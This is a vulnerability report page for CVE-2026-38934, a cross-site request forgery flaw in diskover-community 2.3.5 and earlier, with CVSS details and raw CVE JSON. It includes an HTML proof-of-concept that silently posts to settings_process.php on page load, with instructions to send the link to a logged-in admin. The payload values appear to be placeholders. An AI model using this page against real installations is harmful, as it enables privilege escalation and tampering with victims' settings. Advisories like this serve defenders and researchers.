Security Vulnerability Report
中文
CVE-2026-38934 CVSS 8.8 HIGH

CVE-2026-38934

Published: 2026-04-27 17:16:43
Last Modified: 2026-04-27 18:35:54

Description

Cross Site Request Forgery vulnerability in diskoverdata diskover-community v.2.3.5. and before allows a remote attacker to escalate privileges and obtain sensitive information via the public/settings_process.php

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

diskoverdata diskover-community <= 2.3.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- PoC for CVE-2026-38934: CSRF in diskover-community Usage: Host this file and send the link to an authenticated admin. --> <html> <body> <script> // Function to trigger the CSRF request function exploit() { var xhr = new XMLHttpRequest(); xhr.open("POST", "http://target-url/public/settings_process.php", true); xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); // Payload to escalate privileges or change settings var params = "setting_key=new_admin_value&confirm=1"; xhr.send(params); } // Auto-trigger on load window.onload = exploit; </script> <p>If nothing happens, the exploit may have succeeded.</p> </body> </html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-38934", "sourceIdentifier": "[email protected]", "published": "2026-04-27T17:16:43.037", "lastModified": "2026-04-27T18:35:53.583", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Cross Site Request Forgery vulnerability in diskoverdata diskover-community v.2.3.5. and before allows a remote attacker to escalate privileges and obtain sensitive information via the public/settings_process.php"}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "references": [{"url": "http://diskover-community.com", "source": "[email protected]"}, {"url": "http://diskoverdata.com", "source": "[email protected]"}, {"url": "https://github.com/VadlaReddySai/diskoverdata-cve-writeups/blob/main/CVE-2026-38934", "source": "[email protected]"}, {"url": "https://github.com/VadlaReddySai/diskoverdata-cve-writeups/blob/main/CVE-2026-38934", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}